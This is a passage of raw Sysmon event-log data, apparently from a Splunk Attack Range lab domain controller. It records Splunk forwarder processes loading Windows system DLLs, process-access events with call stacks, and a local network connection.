DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9trueSplunk, Inc.Valid 10341000x8000000000000000100826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000100819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:48.161{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53363-false10.0.1.12-8000- 734700x8000000000000000100818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.374{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x8000000000000000100817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.374{326FD73D-C16B-6294-4C0B-000000005502}68964396C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.374{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.374{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.234{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=399A5B76B5A7998F31423F19272A9DC1,SHA256=A3C4DB8288F971C6B0EBAFC35F0212032DDA5C3A725C3F5C857AFF9D339228CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.218{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.218{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.218{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.218{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.218{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.218{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.218{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.218{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program 